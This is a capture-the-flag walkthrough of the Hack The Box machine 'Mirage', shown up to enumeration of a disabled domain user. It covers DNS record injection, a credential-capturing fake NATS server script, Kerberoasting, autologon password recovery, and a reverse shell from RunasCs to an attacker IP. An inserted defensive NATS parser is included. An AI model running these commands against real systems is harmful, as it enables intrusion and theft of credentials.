Hackthebox: Mirage

Foued SAIDI Lv5

Overview

Mirage is a hard-difficulty machine from Hack The Box. The attack chain is: NFS share leak exposes internal docs → DNS spoofing via nsupdate lets you impersonate a service → Fake NATS server captures Dev_Account_A creds → JetStream log subscription reveals david.jjackson creds → Kerberos LDAP/BloodHound recon maps privilege paths → Weak ACLs (GenericWrite/WriteDACL/AddKeyCredentialLink) → Privilege escalates to high-value domain access.


Reconnaissance

PORT     STATE SERVICE       VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-23 18:10:01Z)
111/tcp open rpcbind?
| rpcinfo:
| program version port/proto service
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=7/23%OT=53%CT=1%CU=38601%PV=Y%DS=2%DC=T%G=Y%TM=6880C3C
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=I%CI=I%TS=A)SEQ(SP=1
OS:04%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=105%GCD=1%ISR=109%TI=I%
OS:CI=I%II=I%SS=S%TS=A)SEQ(SP=108%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=A)SE
OS:Q(SP=108%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=O%TS=A)OPS(O1=M542NW8ST11%O2=M5
OS:42NW8ST11%O3=M542NW8NNT11%O4=M542NW8ST11%O5=M542NW8ST11%O6=M542ST11)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M542NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)
OS:U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
OS:FI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-23T18:11:20
|_ start_date: N/A
|_clock-skew: 6h59m59s

The rpcbind listing is the interesting part: NFS (program 100003) and mountd are registered on port 2049, so the host is exporting NFS shares.

Since NFS is exposed, we can list the exports and mount them:

(base) ┌──(kali㉿kali)-[~]
└─$ showmount -e 10.129.104.218
Export list for 10.129.104.218:
/MirageReports (everyone)

(base) ┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 10.129.104.218:/MirageReports /tmp/nfs

(base) ┌──(kali㉿kali)-[~]
└─$ cd /tmp/nfs

(base) ┌──(kali㉿kali)-[/tmp/nfs]
└─$ ls
Incident_Report_Missing_DNS_Record_nats-svc.pdf Mirage_Authentication_Hardening_Report.pdf

Reading the two PDFs, we learn that nats-svc.mirage.htb is missing from DNS and that the environment enforces Kerberos authentication. Since that service name no longer resolves, we might be able to abuse DNS updates to point it at our attacking machine.

The default NATS port is 4222.

We listen on our own port 4222 (the default NATS server port) and answer any incoming connection with an INFO message, then use nsupdate to add an A record for nats-svc.mirage.htb that points to our machine. A few seconds later a client on the target resolves the name, connects to us and sends its CONNECT message.

The INFO greeting is mandatory: a NATS client waits for the server's INFO line before it sends CONNECT, so without it we never receive the credentials. nsupdate does nothing more than steer the target's client to our port 4222:

(base) ┌──(kali㉿kali)-[/tmp]
└─$ nsupdate
> server 10.129.104.218
> update add nats-svc.mirage.htb 3600 A 10.10.16.3
> send
>

(base) ┌──(kali㉿kali)-[/tmp]
└─$ python3 fake_nats.py
[+] Started
[+] Connection from ('10.129.104.218', 56569)
[>] Received:
CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":false,"no_responders":false}


(base) ┌──(kali㉿kali)-[/tmp]
└─$ cat fake_nats.py
import socket

print("[+] Started")
s = socket.socket()
s.bind(("0.0.0.0", 4222))
s.listen(5)
while True:
    client, addr = s.accept()
    print(f"[+] Connection from {addr}")
    # A NATS client only sends CONNECT after it has received the server's INFO line
    client.sendall(b'INFO {"server_id":"FAKE","version":"2.11.0","auth_required":true}\r\n')
    data = client.recv(1024)
    print("[>] Received:")
    print(data.decode())
    client.close()

Dev_Account_A:hx5h7F5554fP@1337!
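The INFO-before-CONNECT ordering above is also what makes this exposure visible on the wire. The following is an added example, not code from the write-up: a small parser for the NATS text protocol that walks a captured byte stream and reports credentials sent without TLS and secret-looking fields on published subjects. The transcript embedded in it is constructed to mirror the exchange shown above, with the passwords replaced by a placeholder; nothing in it opens a socket.

```python
import json

# Field names that should never travel as message payload on a shared subject
SECRET_KEYS = {"password", "pass", "passwd", "secret", "token", "auth_token"}

# Constructed transcript (not a real capture): server INFO, client CONNECT, one publish
# on logs.auth (the stream subject read later in the write-up) and a PING.
_PAYLOAD = b'{"user":"david.jjackson","password":"<redacted>","ip":"10.10.10.20"}'
SAMPLE_TRANSCRIPT = (
    b'INFO {"server_id":"FAKE","version":"2.11.0","auth_required":true,"tls_required":false}\r\n'
    + b'CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"<redacted>",'
    + b'"tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","protocol":1}\r\n'
    + b"PUB logs.auth " + str(len(_PAYLOAD)).encode() + b"\r\n" + _PAYLOAD + b"\r\n"
    + b"PING\r\n"
)


def parse_nats(data: bytes):
    """Split a NATS byte stream into (op, args, payload) tuples.

    Every operation is one CRLF-terminated line; PUB/MSG/HPUB/HMSG announce a byte
    count as their last argument and are followed by exactly that many payload bytes
    plus a trailing CRLF.
    """
    ops = []
    pos = 0
    while pos < len(data):
        end = data.find(b"\r\n", pos)
        if end == -1:
            raise ValueError("truncated protocol line")
        line = data[pos:end].decode()
        pos = end + 2
        if not line:
            continue
        op, _, args = line.partition(" ")
        op = op.upper()
        payload = None
        if op in ("PUB", "MSG", "HPUB", "HMSG"):
            size = int(args.split()[-1])
            payload = data[pos:pos + size]
            if data[pos + size:pos + size + 2] != b"\r\n":
                raise ValueError("payload not followed by CRLF")
            pos += size + 2
        ops.append((op, args, payload))
    return ops


def audit_transcript(data: bytes) -> list:
    """Return human-readable findings for credential exposure in a captured session."""
    findings = []
    server_tls = False
    for op, args, payload in parse_nats(data):
        if op == "INFO":
            info = json.loads(args)
            server_tls = bool(info.get("tls_required"))
            if info.get("auth_required") and not server_tls:
                findings.append("INFO: server demands credentials but does not require TLS")
        elif op == "CONNECT":
            opts = json.loads(args)
            has_creds = any(k in opts for k in ("user", "pass", "auth_token", "jwt"))
            if has_creds and not (server_tls or opts.get("tls_required")):
                findings.append(f"CONNECT: cleartext credentials for user {opts.get('user')!r}")
        elif op in ("PUB", "MSG") and payload:
            subject = args.split()[0]
            try:
                body = json.loads(payload)
            except ValueError:
                continue
            if isinstance(body, dict) and any(k.lower() in SECRET_KEYS for k in body):
                findings.append(f"{op}: secret-looking field published on subject {subject!r}")
    return findings


if __name__ == "__main__":
    for finding in audit_transcript(SAMPLE_TRANSCRIPT):
        print("[!]", finding)
```

The same parser can be pointed at a TCP stream reassembled from a capture of port 4222. A client that insists on `tls_required` in its CONNECT options, and verifies the server certificate, would not have handed its credentials to a host that merely answered with a plausible INFO line.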

We now install and configure natscli to interact using the credentials we captured:

(base) ┌──(kali㉿kali)-[~/natscli/nats]
└─$ ./nats context add dev-nats \
--server nats://dc01.mirage.htb:4222 \
--user Dev_Account_A \
--password 'hx5h7F5554fP@1337!' \
--description "Dev access"
NATS Configuration Context "dev-nats"

Description: Dev access
Server URLs: nats://dc01.mirage.htb:4222
Username: Dev_Account_A
Password: ******************
Path: /home/kali/.config/nats/context/dev-nats.json

Then we subscribe to every subject; the JetStream stream-management API traffic reveals the only stream, auth_logs:

(base) ┌──(kali㉿kali)-[~/natscli/nats]
└─$ ./nats --context dev-nats sub ">" --count 10
07:37:09 Subscribing on >
[#1] Received on "$JS.API.STREAM.INFO.auth_logs" with reply "_INBOX.NMAzt4nvFdFqsZnhM44z7C.KYtwv5BY"
nil body


[#2] Received on "_INBOX.NMAzt4nvFdFqsZnhM44z7C.KYtwv5BY"
{"type":"io.nats.jetstream.api.v1.stream_info_response","total":0,"offset":0,"limit":0,"config":{"name":"auth_logs","subjects":["logs.auth"],"retention":"limits","max_consumers":-1,"max_msgs":100,"max_bytes":1048576,"max_age":0,"max_msgs_per_subject":-1,"max_msg_size":-1,"discard":"new","storage":"file","num_replicas":1,"duplicate_window":120000000000,"compression":"none","allow_direct":true,"mirror_direct":false,"sealed":false,"deny_delete":true,"deny_purge":true,"allow_rollup_hdrs":false,"consumer_limits":{},"allow_msg_ttl":false,"metadata":{"_nats.level":"1","_nats.req.level":"0","_nats.ver":"2.11.3"}},"created":"2025-05-05T07:18:19.6244845Z","state":{"messages":5,"bytes":570,"first_seq":1,"first_ts":"2025-05-05T07:18:56.6788658Z","last_seq":5,"last_ts":"2025-05-05T07:19:27.2106658Z","num_subjects":1,"consumer_count":0},"cluster":{"leader":"ND4DGBMCTG4RO3T52MUSCLNCS4XNDI26BXXEDYOTUQ56FIOZWP7UZWQM"},"ts":"2025-07-23T18:38:02.1677807Z"}


[#3] Received on "$JS.EVENT.ADVISORY.API"
{"type":"io.nats.jetstream.advisory.v1.api_audit","id":"EsXhuVxO8oVlq8AGrgFeWO","timestamp":"2025-07-23T18:38:02.1677807Z","server":"ND4DGBMCTG4RO3T52MUSCLNCS4XNDI26BXXEDYOTUQ56FIOZWP7UZWQM","client":{"start":"2025-07-23T11:38:02.1672458-07:00","host":"10.129.104.218","id":52,"acc":"dev","user":"Dev_Account_A","name":"NATS CLI Version 0.2.2","lang":"go","ver":"1.41.1","rtt":534900,"server":"ND4DGBMCTG4RO3T52MUSCLNCS4XNDI26BXXEDYOTUQ56FIOZWP7UZWQM","kind":"Client","client_type":"nats"},"subject":"$JS.API.STREAM.INFO.auth_logs","response":"{\"type\":\"io.nats.jetstream.api.v1.stream_info_response\",\"total\":0,\"offset\":0,\"limit\":0,\"config\":{\"name\":\"auth_logs\",\"subjects\":[\"logs.auth\"],\"retention\":\"limits\",\"max_consumers\":-1,\"max_msgs\":100,\"max_bytes\":1048576,\"max_age\":0,\"max_msgs_per_subject\":-1,\"max_msg_size\":-1,\"discard\":\"new\",\"storage\":\"file\",\"num_replicas\":1,\"duplicate_window\":120000000000,\"compression\":\"none\",\"allow_direct\":true,\"mirror_direct\":false,\"sealed\":false,\"deny_delete\":true,\"deny_purge\":true,\"allow_rollup_hdrs\":false,\"consumer_limits\":{},\"allow_msg_ttl\":false,\"metadata\":{\"_nats.level\":\"1\",\"_nats.req.level\":\"0\",\"_nats.ver\":\"2.11.3\"}},\"created\":\"2025-05-05T07:18:19.6244845Z\",\"state\":{\"messages\":5,\"bytes\":570,\"first_seq\":1,\"first_ts\":\"2025-05-05T07:18:56.6788658Z\",\"last_seq\":5,\"last_ts\":\"2025-05-05T07:19:27.2106658Z\",\"num_subjects\":1,\"consumer_count\":0},\"cluster\":{\"leader\":\"ND4DGBMCTG4RO3T52MUSCLNCS4XNDI26BXXEDYOTUQ56FIOZWP7UZWQM\"},\"ts\":\"2025-07-23T18:38:02.1677807Z\"}"}
(base) ┌──(kali㉿kali)-[~/natscli/nats]
└─$ ./nats --context dev-nats consumer next auth_logs audit-reader --count=5 --wait=5s --ack
nats: error: could not load consumer "audit-reader": consumer not found (10014)

(base) ┌──(kali㉿kali)-[~/natscli/nats]
└─$ ./nats --context dev-nats consumer add auth_logs audit-reader --pull --ack=explicit
[dev-nats] ? Start policy (all, new, last, subject, 1h, msg sequence) all
[dev-nats] ? Replay policy instant
[dev-nats] ? Filter Stream by subjects (blank for all)
[dev-nats] ? Maximum Allowed Deliveries -1
[dev-nats] ? Maximum Acknowledgments Pending 0
[dev-nats] ? Deliver headers only without bodies No
[dev-nats] ? Add a Retry Backoff Policy No
Information for Consumer auth_logs > audit-reader created 2025-07-23 14:39:16

Configuration:

Name: audit-reader
Pull Mode: true
Deliver Policy: All
Ack Policy: Explicit
Ack Wait: 30.00s
Replay Policy: Instant
Max Ack Pending: 1,000
Max Waiting Pulls: 512

State:

Host Version: 2.11.3
Required API Level: 0 hosted at level 1
Last Delivered Message: Consumer sequence: 0 Stream sequence: 0
Acknowledgment Floor: Consumer sequence: 0 Stream sequence: 0
Outstanding Acks: 0 out of maximum 1,000
Redelivered Messages: 0
Unprocessed Messages: 5
Waiting Pulls: 0 of maximum 512

(base) ┌──(kali㉿kali)-[~/natscli/nats]
└─$ ./nats --context dev-nats consumer next auth_logs audit-reader --count=5 --wait=5s --ack
[07:39:20] subj: logs.auth / tries: 1 / cons seq: 1 / str seq: 1 / pending: 4

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}

Acknowledged message after 184.202072ms delay

[07:39:21] subj: logs.auth / tries: 1 / cons seq: 2 / str seq: 2 / pending: 3

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}

Acknowledged message after 2.308247828s delay

[07:39:23] subj: logs.auth / tries: 1 / cons seq: 3 / str seq: 3 / pending: 2

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}

david.jjackson:pN8kQmn6b86!1234@

We can now use these credentials to collect LDAP data with bloodhound-python:

(base) ┌──(kali㉿kali)-[~]
└─$ bloodhound-python -u david.jjackson -p 'pN8kQmn6b86!1234@' -k -d mirage.htb -ns 10.129.104.218 -c All --zip
INFO: Found AD domain: mirage.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.mirage.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.mirage.htb
INFO: Found 12 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 21 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.mirage.htb
INFO: Done in 00M 18S
INFO: Compressing output into 20250723144033_bloodhound.zip

We can also enumerate domain users and groups by brute-forcing RIDs:

(base) ┌──(kali㉿kali)-[/tmp]
└─$ nxc smb dc01.mirage.htb -u 'david.jjackson' -p 'pN8kQmn6b86!1234@' -k --rid-brute
SMB dc01.mirage.htb 445 dc01 [*] x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.mirage.htb 445 dc01 [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
SMB dc01.mirage.htb 445 dc01 498: MIRAGE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 500: MIRAGE\Administrator (SidTypeUser)
SMB dc01.mirage.htb 445 dc01 501: MIRAGE\Guest (SidTypeUser)
SMB dc01.mirage.htb 445 dc01 502: MIRAGE\krbtgt (SidTypeUser)
SMB dc01.mirage.htb 445 dc01 512: MIRAGE\Domain Admins (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 513: MIRAGE\Domain Users (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 514: MIRAGE\Domain Guests (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 515: MIRAGE\Domain Computers (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 516: MIRAGE\Domain Controllers (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 517: MIRAGE\Cert Publishers (SidTypeAlias)
SMB dc01.mirage.htb 445 dc01 518: MIRAGE\Schema Admins (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 519: MIRAGE\Enterprise Admins (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 520: MIRAGE\Group Policy Creator Owners (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 521: MIRAGE\Read-only Domain Controllers (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 522: MIRAGE\Cloneable Domain Controllers (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 525: MIRAGE\Protected Users (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 526: MIRAGE\Key Admins (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 527: MIRAGE\Enterprise Key Admins (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 553: MIRAGE\RAS and IAS Servers (SidTypeAlias)
SMB dc01.mirage.htb 445 dc01 571: MIRAGE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB dc01.mirage.htb 445 dc01 572: MIRAGE\Denied RODC Password Replication Group (SidTypeAlias)
SMB dc01.mirage.htb 445 dc01 1000: MIRAGE\DC01$ (SidTypeUser)
SMB dc01.mirage.htb 445 dc01 1101: MIRAGE\DnsAdmins (SidTypeAlias)
SMB dc01.mirage.htb 445 dc01 1102: MIRAGE\DnsUpdateProxy (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 1103: MIRAGE\Development Team (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 1104: MIRAGE\Dev_Account_A (SidTypeUser)
SMB dc01.mirage.htb 445 dc01 1105: MIRAGE\Dev_Account_B (SidTypeUser)
SMB dc01.mirage.htb 445 dc01 1106: MIRAGE\IT_Admins (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 1107: MIRAGE\david.jjackson (SidTypeUser)
SMB dc01.mirage.htb 445 dc01 1108: MIRAGE\javier.mmarshall (SidTypeUser)
SMB dc01.mirage.htb 445 dc01 1109: MIRAGE\mark.bbond (SidTypeUser)
SMB dc01.mirage.htb 445 dc01 1110: MIRAGE\nathan.aadam (SidTypeUser)
SMB dc01.mirage.htb 445 dc01 1112: MIRAGE\Mirage-Service$ (SidTypeUser)
SMB dc01.mirage.htb 445 dc01 2601: MIRAGE\Exchange_Admins (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 2602: MIRAGE\IT_Support (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 2603: MIRAGE\IT_Contractors (SidTypeGroup)
SMB dc01.mirage.htb 445 dc01 2604: MIRAGE\svc_mirage (SidTypeUser)

We will also attempt Kerberoasting to obtain service account hashes:

(base) ┌──(kali㉿kali)-[~]
└─$ impacket-GetUserSPNs 'mirage.htb/david.jjackson' -dc-host dc01.mirage.htb -k -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
[-] CCache file is not found. Skipping...
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------ ------------ ------------------------------------------------------------------- -------------------------- -------------------------- ----------
HTTP/exchange.mirage.htb nathan.aadam CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb 2025-06-23 17:18:18.584667 2025-07-04 16:01:43.511763



[-] CCache file is not found. Skipping...
$krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/nathan.aadam*$a1830dfc38b31607d378067d21d40a99$...

We crack the hash to get the password:

(base) ┌──(kali㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3edc#EDC3 (?)
1g 0:00:00:03 DONE (2025-07-23 16:24) 0.2652g/s 3307Kp/s 3307Kc/s 3307KC/s 3er733..3ddfiebw
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We request a ticket with this password and we get the user flag:

(base) ┌──(kali㉿kali)-[~]
└─$ impacket-getTGT mirage.htb/nathan.aadam:'3edc#EDC3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in nathan.aadam.ccache

(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=nathan.aadam.ccache

(base) ┌──(kali㉿kali)-[~]
└─$ evil-winrm -i dc01.mirage.htb -r mirage.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> cat ../desktop/user.txt
1d0d6aef2bfb146cca9f75ecd9498908
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

I used PowerUp.ps1 to check for autologon creds:

*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> Invoke-AllChecks

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...
Access denied
At C:\Users\nathan.aadam\Documents\p.ps1:1451 char:21
+ $VulnServices = Get-WmiObject -Class win32_service | Where-Object ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


[*] Checking service executable and argument permissions...
Access denied
At C:\Users\nathan.aadam\Documents\p.ps1:1504 char:5
+ Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pat ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


[*] Checking service permissions...
Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At C:\Users\nathan.aadam\Documents\p.ps1:1555 char:5
+ Get-Service | Test-ServiceDaclPermission -PermissionSet 'ChangeCo ...
+ ~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Get-Service], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand


[*] Checking %PATH% for potentially hijackable DLL locations...


ModifiablePath : C:\Users\nathan.aadam\AppData\Local\Microsoft\WindowsApps
IdentityReference : MIRAGE\nathan.aadam
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\nathan.aadam\AppData\Local\Microsoft\WindowsApps
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\nathan.aadam\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'





[*] Checking for AlwaysInstallElevated registry key...


[*] Checking for Autologon credentials in registry...


DefaultDomainName : MIRAGE
DefaultUserName : mark.bbond
DefaultPassword : 1day@atime
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :





[*] Checking for modifidable registry autoruns and configs...


[*] Checking for modifiable schtask files/configs...


[*] Checking for unattended install files...


[*] Checking for encrypted web.config strings...


[*] Checking for encrypted application pool and virtual directory passwords...


[*] Checking for plaintext passwords in McAfee SiteList.xml files....



[*] Checking for cached Group Policy Preferences .xml files....

mark.bbond:1day@atime

We can also read the configuration file for nats:

*Evil-WinRM* PS C:\program files\nats-server> cat nats-server.conf
listen: '0.0.0.0:4222'

jetstream: {
store_dir: 'C:\Program Files\Nats-Server\tmp'
}

accounts: {
'$SYS': {
users: [
{ user: 'sysadmin', password: 'bb5M0k5XWIGD' }
]
},

'dev': {
jetstream: true,
users: [
{ user: 'Dev_Account_A', password: 'hx5h7F5554fP@1337!' },
{ user: 'Dev_Account_B', password: 'tvPFGAzdsJfHzbRJ' }
]
}
}
*Evil-WinRM* PS C:\Users\nathan.aadam\desktop> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUsername

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
DefaultUsername REG_SZ mark.bbond

*Evil-WinRM* PS C:\Users\nathan.aadam\desktop> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
DefaultPassword REG_SZ 1day@atime

Now we get a shell as mark.bbond with RunasCs:

*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> iwr 10.10.16.3/RunasCs.exe -outfile r.exe
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> ./r.exe mark.bbond 1day@atime powershell.exe -r 10.10.16.3:4444
[*] Warning: The logon for user 'mark.bbond' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-4345ab$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2256 created in background.
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>


(base) ┌──(kali㉿kali)-[~/Downloads]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.3] from (UNKNOWN) [10.129.104.218] 63865
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
mirage\mark.bbond
PS C:\Windows\system32>

mark.bbond is a member of IT_SUPPORT, which has ForceChangePassword over JAVIER.MMARSHALL.
The path is as follows:
get a ticket as mark.bbond -> export it -> remove ACCOUNTDISABLE from javier -> update javier's logonHours with a script -> change javier's password -> use nxc to dump the gMSA password

PS C:\Windows\system32> Get-ADUser JAVIER.MMARSHALL -Property *
Get-ADUser JAVIER.MMARSHALL -Property *


AccountExpirationDate :
accountExpires : 9223372036854775807
AccountLockoutTime :
AccountNotDelegated : False
AllowReversiblePasswordEncryption : False
AuthenticationPolicy : {}
AuthenticationPolicySilo : {}
BadLogonCount : 0
badPasswordTime : 0
badPwdCount : 0
CannotChangePassword : True
CanonicalName : mirage.htb/Disabled/Users/javier.mmarshall
Certificates : {}
City :
CN : javier.mmarshall
codePage : 0
Company :
CompoundIdentitySupported : {False}
Country :
countryCode : 0
Created : 5/2/2025 1:33:11 AM
createTimeStamp : 5/2/2025 1:33:11 AM
Deleted :
Department :
Description : Contoso Contractors
DisplayName : javier.mmarshall
DistinguishedName : CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
Division :
DoesNotRequirePreAuth : False
dSCorePropagationData : {5/22/2025 2:49:20 PM, 5/22/2025 2:45:45 PM, 5/22/2025 2:02:51 PM, 5/22/2025
1:08:07 PM...}
EmailAddress :
EmployeeID :
EmployeeNumber :
Enabled : False
Fax :
GivenName : javier.mmarshall
HomeDirectory :
HomedirRequired : False
HomeDrive :
HomePage :
HomePhone :
Initials :
instanceType : 4
isDeleted :
KerberosEncryptionType : {None}
LastBadPasswordAttempt :
LastKnownParent :
lastLogoff : 0
lastLogon : 133926722371201785
